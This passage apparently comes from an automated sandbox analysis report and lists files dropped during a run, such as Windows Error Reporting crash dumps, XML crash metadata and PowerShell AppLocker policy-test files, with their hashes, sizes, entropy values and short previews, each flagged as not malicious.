                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:49 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):111634
                              Entropy (8bit):2.1700591180910185
                              Encrypted:false
                              SSDEEP:384:5C//ISqqjuEj6PDZBYfNog+QI+J3tG3W6To11Jr7LlLhsX9wygNifcKf5t:YgSq4SZBqogdG3pTo11/Lhzscm5
                              MD5:13153F245A415E8103B0865916CD08DE
                              SHA1:AB0CCBBC4EFE23031CC1DF10FA997903742BBB6D
                              SHA-256:AD721C8228746ED53EA7B905B0E7FC10BD26BD0AC8AB7F8A6C556561E7A0E9BE
                              SHA-512:26D9C19A2C5F6696DD592461F74622C7272EE9584F7E63A5F13F4B9BAD9D6F338CA84AC10C0DFF2AB787996515C668130325195AC971A0A82CB3CABA67835EE6
                              Malicious:false
                              Preview:MDMP..a..... .........f....................................<....$..........8N..........`.......8...........T............D...p...........%...........&..............................................................................eJ.......'......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F7E.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6410
                              Entropy (8bit):3.7164670635306973
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJt6Y6CUYDJtO3puU89b4HsfbEAom:R6lXJ36JYDJtOQ4Mfbb
                              MD5:6DCD769FFF6BDCACE450B935B24A8395
                              SHA1:BB60C3FD6BA5CC9325FB308353FCCAC9C7BEB8AE
                              SHA-256:170132296494DF8E47D9AE8806BD912AB32CAEA6CB7B64A4902F55C90F1CCE46
                              SHA-512:0638E98EE397285017D7417915959E0B6BA86314D91C38A3741BF68030D9D90153E732796F5A32182F2EF866115E1A3004A8788F5AF48BE9EFD238F5BB0CABC3
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.4.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FAE.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4776
                              Entropy (8bit):4.440214655369833
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsquJg77aI9riBWpW8VYjCYm8M4JwuTfmFp+q8vCf+m1HAcHSUd:uIjflI7UQ7VaJwuTiKCWm1HAcHSUd
                              MD5:7D31A6A7B00F174B2A2E8618BCADFA53
                              SHA1:E0C3C2ECD492868F94E0653EB62F8192581B4CB5
                              SHA-256:2D7DCD1AF7C292218AF607FA5C9855E86236D226CF221F822E728C02C5D99FDE
                              SHA-512:085E96AC2963614B6AD14A6CF0D77A4B9ABBCD676C6A809EE4C27F18A47F3A90BC37793EB7FE120356CBB22AF36EF8FAAB20FA38BCCA78BDDA8DE5BD532EAFD0
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517369" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER725C.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:50 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):110752
                              Entropy (8bit):2.175877710728553
                              Encrypted:false
                              SSDEEP:384:+/EnISqqjuEj6qmZB8Ehq+3YjJ3HG/W6To11tbOgR8wGm4iGm15CP7:+PSq4XmZB8Ehq9G/pTo11QgR8wv9IP7
                              MD5:8EB14848B11B41CF3C4E43ADA06E2C35
                              SHA1:60009E72FDFBF7C7225DAD8D06CB5F4DD49BCB47
                              SHA-256:5A83821F19B3923C0B309139A57B69400798F58AD1C3C478CD9660512946E487
                              SHA-512:4BCF3688E4C55C49EDA54279CADE65FA8BD2451F87DCB77B527345DC580BFA130C83DAE1CB378E65623EDAF86B1B4BFD1DAFDA783F3EB187D0B9B89FA14C117E
                              Malicious:false
                              Preview:MDMP..a..... .........f....................................<....$..........8N..........`.......8...........T............C...m...........%...........&..............................................................................eJ.......'......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER7357.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6410
                              Entropy (8bit):3.714674680411623
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJt6M6E6+YDJtOK2puT89bYHsfN6Im:R6lXJj6gYDJtOK0YMfS
                              MD5:5849474776DB562D7E697CE3D4DEE8CF
                              SHA1:1B0F49B4FC5ECE201613D628932C34CD1BC9F8DD
                              SHA-256:1B74A1C5AB8ECC89544A89680FEA789067159D1673C4F9660937F5A2ACF2FD0B
                              SHA-512:B3671C7C2C401E438150C9DE44A4A5527858DE4B092BF668F64981C5D726BCA3B62EE1F3E95B09DD775158CA649D5406706B6A60B5DA30AB5E52EC654B5DDDB5
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.4.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER7377.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4776
                              Entropy (8bit):4.441051246534752
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsquJg77aI9riBWpW8VYjgYm8M4JwuTfmFr+q8vCf+m1HAcHSUd:uIjflI7UQ7VQJwuTgKCWm1HAcHSUd
                              MD5:775B392C1839EB6D318787EA71DF0485
                              SHA1:C960300A131D8C7A3A44C4AE6DB85D4E4E1C1A48
                              SHA-256:2051DAA44D7B9DBAA6FE7DEF304194CC03DB291F3F4FCFE87B68EC5C6E762DB9
                              SHA-512:A9CE6529D27DD2665681FA27E27E717C942CF7E9A37BF4991AB4082A7F18E4923D8FC4B6C659B317D2E501E392DF5951EBD5465FDF3BD579C338A031E4B84EF5
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517369" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER7634.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:51 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):106808
                              Entropy (8bit):2.172258616149112
                              Encrypted:false
                              SSDEEP:384:EOtISqqjuEj6KZBCmmq+3YDJ3HG8zzfo0WxNlAtuWqjnG/SvuaGXDd1J8hT5++c:BmSq4bZBC5qdG8vfo0ElAtu9wdy5++c
                              MD5:5043FB3A074211CE653AE3394F1580E4
                              SHA1:FA5D524E79B4A5C8652DE12FF40DA67807D806AD
                              SHA-256:FE7F41DE80D67A7F613E74287F6F357CC8B395B9A04C7EBDA61B1CAC5074BE9A
                              SHA-512:D5D68EF9894F70806C429F700163D6E2FA28BFCF001DAA46D9C999D9A1179720005738DA686C2697B7224B641BBBA455C0D7F2ECD442855D01D0D065140DFB59
                              Malicious:false
                              Preview:MDMP..a..... .........f....................................<....$..........8N..........`.......8...........T...........PB...^...........%...........&..............................................................................eJ.......'......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER772F.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6396
                              Entropy (8bit):3.713577827754243
                              Encrypted:false
                              SSDEEP:96:RSIU6o7wVetbt6D62VYDJahE+5aMQUP89bhHsf9HvLm:R6l7wVeJt6D62VYDJaZpDP89bhHsfNLm
                              MD5:272A4D91B961BD542B2E8863A03943E7
                              SHA1:C9DF3F4285BA14C4E5148FDD3E3A13CBA34F7146
                              SHA-256:07B7BFA501C5F22DF133FD8CF5D37E02EC5FE9DE52143E226FA4AC22859BBCE0
                              SHA-512:33F8650673677A1CB426C0CE5C873453A6B07F9D1C52EC027DB79739A53C90A49AE3C3F991BD55D926F1BD9466D7199CA2270BE31A98624B7642908FBB4BF1D4
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.4.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER774F.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4776
                              Entropy (8bit):4.446580563616763
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsquJg77aI9riBWpW8VYj0Ym8M4JwuTfleFs+q8vCflmm1HAcHSUd:uIjflI7UQ7VEJwuT9DKC9mm1HAcHSUd
                              MD5:BA200BAC34410A0BD6F391E271389F46
                              SHA1:58FB21389F2D2929C79D539A60DA79ED1208EE0F
                              SHA-256:17FAE734B858586DA7CA4D2E736BF051FF581452B597AED44F76016DA699966B
                              SHA-512:08A987C879640AEE6CB663085596EDECBEEEA359DEA826D4F2E99D5396834D3FBB47C7153AE4B61F84233316CF95D0A9EBDFF5831DF8F3BFE6B67453891779D9
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517369" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9545.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:59 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):112256
                              Entropy (8bit):2.1771936571854846
                              Encrypted:false
                              SSDEEP:768:HeZ8JB0FlG/IzuoPX7a68MpNagLgaghwgK/x9jdByG:Hszl4IlrhNagVJ9Z9jdByG
                              MD5:78C030A269210DB202D14FC9B6DA4C69
                              SHA1:567479CC46C99A8BA14D7F4D949ABAF429DD06C7
                              SHA-256:EF83528B8C437DC766A30116A7E2396EAF4FD35C6D02347FD9389B4E30953954
                              SHA-512:DB49043CA1AA85990129847CD95AFD717377A602A6F9ABB6173D516AD9F8EF471A3B929FCD8C9A6FE56F29522A504751E3F00027ABE495041F6ABA9DA96AB4A0
                              Malicious:false
                              Preview:MDMP..a..... .........f....................................T....$...........N..........`.......8...........T...........0D..Pr..........(%...........'..............................................................................eJ.......'......GenuineIntel............T.............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9602.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8398
                              Entropy (8bit):3.7031460673612497
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJul6FT6Y94SU9XEmgmfW6prw89bp4sfxjm:R6lXJk6h6YCSU9XEmgmfWKprf4
                              MD5:FD50E145C9E9DBB730F344B6DC8A9F70
                              SHA1:3B09A011F267081CCC902F00D1F65F70C7085981
                              SHA-256:DDB611468746A96AD7809263A5600E649B99ABC12474269AE4BDA6479F7E934A
                              SHA-512:1C88D84E19B947F73D7B0E1B50432A2561A88D43AE667FA0A79E0C9F7B8E55FAF74BF2269B63EC6FE620FEA24CE659813D87B5CFE9D185C89FF78E9C67289E03
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.<./.P.i.d.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9632.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4709
                              Entropy (8bit):4.498618808951964
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsquJg77aI9riBWpW8VYjoPYm8M4JwuTfqF66+q82PRm1HAcHLUd:uIjflI7UQ7V9SJwuTwzpm1HAcHLUd
                              MD5:9AC958A42939BE28A13F87CE1F66B363
                              SHA1:940EF9424D6031BECE3B856532F6751D18B5A064
                              SHA-256:D1232145DFF5617145E07F32DF30E0FFC339ADB3FE79697FF0AEAD35BAADEFCF
                              SHA-512:899031A9F0A49B05D842F0527D48E3507D433E4105F6E68DFEC0F90F63042E2FC9A1CD4A4EA9CF709E11A15C7013E2B5680D875851C5BE3F5AC191F2178A4E73
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517369" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2468
                              Entropy (8bit):5.5617838632791745
                              Encrypted:false
                              SSDEEP:48:OWSU4xympgv4RIoUP7mZ9tK8NWR85YdWNNLbR11XWKmEqrI6lxzQh/:OLHxv2IfBZ2KWmYdWTRbrvqrI6v0/
                              MD5:514D7854938D395C95BAE82D6F73CC01
                              SHA1:AF58640B7829CC8C252E0325919FDB12DC3CE8B9
                              SHA-256:7795366E8B3025A4EE3C786406F79CF7E8039DAFB47BCFC920BC84A861A7071B
                              SHA-512:2454BDD14DE328F201F467F16BED9A177136F3C27331C06FB0719F83A547D136C7528FF28634A7391A5D35D04EBBA445F9C62EAFB8351EC90EFB3A777C0F64E5
                              Malicious:false
                              Preview:@...e.................................,..............@..........P................1]...E.....#.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h4c44qq.aqz.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jngmtqb.epp.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anvhf53m.wns.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqbu2tt4.x4g.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fk2vrmc2.l3j.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
